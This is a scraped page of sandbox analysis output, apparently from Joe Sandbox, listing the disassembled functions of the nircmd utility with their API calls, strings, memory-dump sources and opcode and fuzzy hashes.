                                                                                                                                                          Function 000000014000ABCC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ByteCharInitializeMultiWide_stricmpmemset
                                                                                                                                                          • String ID: default_record
                                                                                                                                                          • API String ID: 280450401-2087032002
                                                                                                                                                          • Opcode ID: f688a93f2687a77f178bbbcb5e4e2beb38c2e1f23ddc1145a1ee6eb81f053987
                                                                                                                                                          • Instruction ID: 4650d00a0f4bb6349774e66b8a0fa80a006b999bbafc450c015f70ebd7f64630
                                                                                                                                                          • Opcode Fuzzy Hash: f688a93f2687a77f178bbbcb5e4e2beb38c2e1f23ddc1145a1ee6eb81f053987
                                                                                                                                                          • Instruction Fuzzy Hash: EC41D37260464486EB27DB27F400BE963E1B78DBC8F054525FF4A5BAA5DF39C4468700
                                                                                                                                                          Function 00000001400031D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: atoimemcpymemsetstrlenstrtoul
                                                                                                                                                          • String ID: -
                                                                                                                                                          • API String ID: 1661471046-2547889144
                                                                                                                                                          • Opcode ID: 1f63e8d6d17618599135d86de67db2b33c8ca6db79817fdbd4a9cc827321d703
                                                                                                                                                          • Instruction ID: 98edbc27bc149f0130c8c2a00779351330696e7f8035b1cc4a17207810a778be
                                                                                                                                                          • Opcode Fuzzy Hash: 1f63e8d6d17618599135d86de67db2b33c8ca6db79817fdbd4a9cc827321d703
                                                                                                                                                          • Instruction Fuzzy Hash: 0A1108B2A0C28095FB37EF26E4413E97791EB8D784F448122A3490B996DB3DC6558700
                                                                                                                                                          Function 00000001400042B8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                          • String ID: ChangeDisplaySettingsExA$user32.dll
                                                                                                                                                          • API String ID: 1646373207-1164668496
                                                                                                                                                          • Opcode ID: 3f37451d4a6ca2ec2b0be9d7e7440650bc99815d18a364191b9a65f6bf2c306b
                                                                                                                                                          • Instruction ID: 966dd5e2eb9a60b6bf6f476c4dbf2258b39d9e62d7eead2f1d38c0a30f502c68
                                                                                                                                                          • Opcode Fuzzy Hash: 3f37451d4a6ca2ec2b0be9d7e7440650bc99815d18a364191b9a65f6bf2c306b
                                                                                                                                                          • Instruction Fuzzy Hash: 57F04972715B8086EB51CB06F84079AA3A0FB8CBC0F984539AF4C47B69DF39C9058B00
                                                                                                                                                          Function 0000000140011EC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,0000000140011A50,?,?,?,?,?,?,?,?), ref: 0000000140011EDD
                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,0000000140011A50,?,?,?,?,?,?,?,?), ref: 0000000140011EF2
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                          • String ID: SetSystemPowerState$kernel32.dll
                                                                                                                                                          • API String ID: 1646373207-2693784556
                                                                                                                                                          • Opcode ID: 87cbea494520f34f063a927567f1eda031bd3d05d2a56f04c079e8c503b92ba7
                                                                                                                                                          • Instruction ID: 466539e4f917aa9a26d36aa18016fdff58c860a644d85ff7d001c63dc9f17f0f
                                                                                                                                                          • Opcode Fuzzy Hash: 87cbea494520f34f063a927567f1eda031bd3d05d2a56f04c079e8c503b92ba7
                                                                                                                                                          • Instruction Fuzzy Hash: CBE06D3230168096EB468F66F8803A862A2A78C790F984534B71E4F365DF79C9898300
                                                                                                                                                          Function 000000014000783C Relevance: 6.3, APIs: 5, Instructions: 69stringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: strcmpstrlen$memsetstrcatstrcpy
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3634204486-0
                                                                                                                                                          • Opcode ID: 75ab2747b2270b77f62cc8d410d37e37cc4d719bfcd073ac1ef0c6e4088ec0f7
                                                                                                                                                          • Instruction ID: bfbaaef8bf44a8684bd47ef9383ea7e467a8a455086e6d30afcec7c62ac8376f
                                                                                                                                                          • Opcode Fuzzy Hash: 75ab2747b2270b77f62cc8d410d37e37cc4d719bfcd073ac1ef0c6e4088ec0f7
                                                                                                                                                          • Instruction Fuzzy Hash: A42190B261478086EA15EB13E595BE93395E788BC0F488022FF494B796EF78C601C744
                                                                                                                                                          Function 0000000140007728 Relevance: 6.3, APIs: 5, Instructions: 69stringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: strcmpstrlen$memsetstrcatstrcpy
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3634204486-0
                                                                                                                                                          • Opcode ID: 94824af1d32d9ea0390e46de89a55322beaa643d731f983ce77801ee981ba7de
                                                                                                                                                          • Instruction ID: 6fc7987039369ae81cb67713122ea0bcdbc11566a31e3237bd6550f38ff94291
                                                                                                                                                          • Opcode Fuzzy Hash: 94824af1d32d9ea0390e46de89a55322beaa643d731f983ce77801ee981ba7de
                                                                                                                                                          • Instruction Fuzzy Hash: E22190B171478086EA15DB13E585BED3395E788BC0F498022FF494B796DF78C601C744
                                                                                                                                                          Function 000000014001223C Relevance: 6.1, APIs: 4, Instructions: 76stringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle$OpenProcessVersionstrcpy
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4262128070-0
                                                                                                                                                          • Opcode ID: e1699459c397ad271651afe366f61255b9c01b919d58f62fa040baf98259ce18
                                                                                                                                                          • Instruction ID: 81ae96f3b8bfca4d168ce7fae0768a7d1399ae3365220b7b1bc7082b421af199
                                                                                                                                                          • Opcode Fuzzy Hash: e1699459c397ad271651afe366f61255b9c01b919d58f62fa040baf98259ce18
                                                                                                                                                          • Instruction Fuzzy Hash: 4B317E31204A80D6EB229B57A8847ED73A1F78DBC0F544526FB5A4B7A8CF3EC549CB00
                                                                                                                                                          Function 0000000140014A1C Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: memcpy$memsetwcscmp
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1148404714-0
                                                                                                                                                          • Opcode ID: fc8f1a26565cfd4c0040ef9e554f57077af07ebc5daa61ed1823985d550ee296
                                                                                                                                                          • Instruction ID: eee7a3a9470ef84088492f9d1a57d06c82348a978fc83e8abd4508d2f8c3510e
                                                                                                                                                          • Opcode Fuzzy Hash: fc8f1a26565cfd4c0040ef9e554f57077af07ebc5daa61ed1823985d550ee296
                                                                                                                                                          • Instruction Fuzzy Hash: 48318D7271478086EB25DF22E0943CDB361F788BC0F594021EF994B6AADB39DA05CB40
                                                                                                                                                          Function 0000000140003C34 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1865533344-0
                                                                                                                                                          • Opcode ID: 89e6685dbfa4c7a4e9f70830d1b50f5b51b4dcba3405d8ac2252e3b7a76d6c5e
                                                                                                                                                          • Instruction ID: de6de90a826d7195813b56192c85afc5a661561055ad69689520fe7ef2cc45be
                                                                                                                                                          • Opcode Fuzzy Hash: 89e6685dbfa4c7a4e9f70830d1b50f5b51b4dcba3405d8ac2252e3b7a76d6c5e
                                                                                                                                                          • Instruction Fuzzy Hash: 042139B1A05B8081EA17DB17B9907A873A5E78CBD0F548122FB698B7B5DA3EC1528740
                                                                                                                                                          Function 000000014001389C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                          • String ID: ServicesActive
                                                                                                                                                          • API String ID: 1452528299-3071072050
                                                                                                                                                          • Opcode ID: 910eb002441a54e69e51c7c7e3d182536b646fe0148462de6ca462ab3dab869b
                                                                                                                                                          • Instruction ID: 285f6f878f5552715b76fdd4f724bc5274a3e707ff24778ffb50b5128dbea1ae
                                                                                                                                                          • Opcode Fuzzy Hash: 910eb002441a54e69e51c7c7e3d182536b646fe0148462de6ca462ab3dab869b
                                                                                                                                                          • Instruction Fuzzy Hash: 30213831208B80C2D7219F26A84478973B6F74DBC4F984135FB8A8BB64DF7AC8458700
                                                                                                                                                          Function 0000000140003A10 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$CloseCreateFindReadSizefree
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4050032896-0
                                                                                                                                                          • Opcode ID: 5075c0c25f31f76edd1cd96cc116926c50790617d62c10593a9e5cc6119b6bba
                                                                                                                                                          • Instruction ID: 4a57bbc7cce6efebe9ff31d1db199c99861a3a71c8738da2f7410aa6d245db6e
                                                                                                                                                          • Opcode Fuzzy Hash: 5075c0c25f31f76edd1cd96cc116926c50790617d62c10593a9e5cc6119b6bba
                                                                                                                                                          • Instruction Fuzzy Hash: 4A115B32714A4082EB16DF66E4103AAB7A1E78CFE8F048212FB594B7A9CF7DC045CB41
                                                                                                                                                          Function 00000001400014E4 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ItemText$LengthWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2992503306-0
                                                                                                                                                          • Opcode ID: e7c047b6dfc3a84bf1a64fb7f470dfa50d53984dee624b4709404c8b2a72aeb6
                                                                                                                                                          • Instruction ID: 1d703d3bb772064ab641752a02e052fd4f3cc7a71b23bcea2c48d04600109df8
                                                                                                                                                          • Opcode Fuzzy Hash: e7c047b6dfc3a84bf1a64fb7f470dfa50d53984dee624b4709404c8b2a72aeb6
                                                                                                                                                          • Instruction Fuzzy Hash: 43114772604A81C2E712CF66F8007DA77A1F3C8BD4F588122EB495B669CF39C9468780
                                                                                                                                                          Function 0000000140003040 Relevance: 6.0, APIs: 4, Instructions: 47filetimeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetFileAttributesA.KERNEL32(?,?,?,?,00000000,?,?,00000001400075EF), ref: 0000000140003071
                                                                                                                                                          • CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140007816), ref: 00000001400030A1
                                                                                                                                                          • SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140007816), ref: 00000001400030BC
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140007816), ref: 00000001400030C7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$AttributesCloseCreateHandleTime
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1550419386-0
                                                                                                                                                          • Opcode ID: 063cfadb91479f2fc7e7753d12c16e99722c77a058438f136c659625808421c6
                                                                                                                                                          • Instruction ID: 348b5e4cb04dc36cba599894ec3b29f7965973e3e5b7ae58714e3626ef2f48f6
                                                                                                                                                          • Opcode Fuzzy Hash: 063cfadb91479f2fc7e7753d12c16e99722c77a058438f136c659625808421c6
                                                                                                                                                          • Instruction Fuzzy Hash: ED01617270478087E711DF57B840B4AB6A5F788BE4F444229FFA947BA4CF3CC4458A00
                                                                                                                                                          Function 0000000140001754 Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Global$LockSizeUnlockmemset
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4280295638-0
                                                                                                                                                          • Opcode ID: fdc3a48def9e19fda21e5e5cbad33837b27fb43505b1143f80bd41de1e41ef10
                                                                                                                                                          • Instruction ID: a822b221c0c26ee8a8a71456cd6e132ec993c4c579ad991a0f0eab173df7336c
                                                                                                                                                          • Opcode Fuzzy Hash: fdc3a48def9e19fda21e5e5cbad33837b27fb43505b1143f80bd41de1e41ef10
                                                                                                                                                          • Instruction Fuzzy Hash: 0F01E576604A40C2DB629F2AE4547D9B3B1F7C8FC9F188112EB5E47664CE39C995CB40
                                                                                                                                                          Function 000000014000573C Relevance: 6.0, APIs: 4, Instructions: 22sleepsynchronizationCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandleObjectOpenProcessSingleSleepWait
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3687349101-0
                                                                                                                                                          • Opcode ID: 895f0628ff3e9e8bd9fe4367de51977ea2beda561ab88b4fe394796040880853
                                                                                                                                                          • Instruction ID: 09760b2e1178fdc696ffb32a1977e8c57a8f8849adf20b086b8091a4597bdc5a
                                                                                                                                                          • Opcode Fuzzy Hash: 895f0628ff3e9e8bd9fe4367de51977ea2beda561ab88b4fe394796040880853
                                                                                                                                                          • Instruction Fuzzy Hash: FDE04F7474960593FF5EA7677814BB612619B8EBC7F084028AF4E0B7B0DE3984858B00
                                                                                                                                                          Function 00000001400048B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _mbsicmpmemset
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2422848218-3916222277
                                                                                                                                                          • Opcode ID: 09275a1d8774a47eec2c496bc2ca5a3d92bcdea1488a9d49fd0accf56bbba072
                                                                                                                                                          • Instruction ID: f6fcc08f7c0357ba0270faa8758687ed5cf4e14fc01418392d579a45a0130fec
                                                                                                                                                          • Opcode Fuzzy Hash: 09275a1d8774a47eec2c496bc2ca5a3d92bcdea1488a9d49fd0accf56bbba072
                                                                                                                                                          • Instruction Fuzzy Hash: 2141ABB3604680CAE7A5CF26F440B9EB7A1F788788F054025FB8947A9AEB79C455CB04
                                                                                                                                                          Function 0000000140004400 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoMonitorfreememcpy
                                                                                                                                                          • String ID: H
                                                                                                                                                          • API String ID: 237967243-2852464175
                                                                                                                                                          • Opcode ID: 2b914d181b0e730d9184c15c5d82e3fe0ddd730052b989bbfa29edc9095389b1
                                                                                                                                                          • Instruction ID: fb3c937363408fb5f05511fcd611642e4ed32da75759190e007c904ce70b8885
                                                                                                                                                          • Opcode Fuzzy Hash: 2b914d181b0e730d9184c15c5d82e3fe0ddd730052b989bbfa29edc9095389b1
                                                                                                                                                          • Instruction Fuzzy Hash: 6D015AB2314B8093EB10CF25E180799B760F7587C4F408025AB9907A5ACB78D568CB40
                                                                                                                                                          Function 0000000140011F14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                          • String ID: netapi32.dll
                                                                                                                                                          • API String ID: 2574300362-1182877548
                                                                                                                                                          • Opcode ID: b052ba7497111277b3ba21765acb3b39545183616084ba34677739d019605dc2
                                                                                                                                                          • Instruction ID: 08c6805928ab132929a5ff331c87147411356703df2278827d3c9356ee2857c7
                                                                                                                                                          • Opcode Fuzzy Hash: b052ba7497111277b3ba21765acb3b39545183616084ba34677739d019605dc2
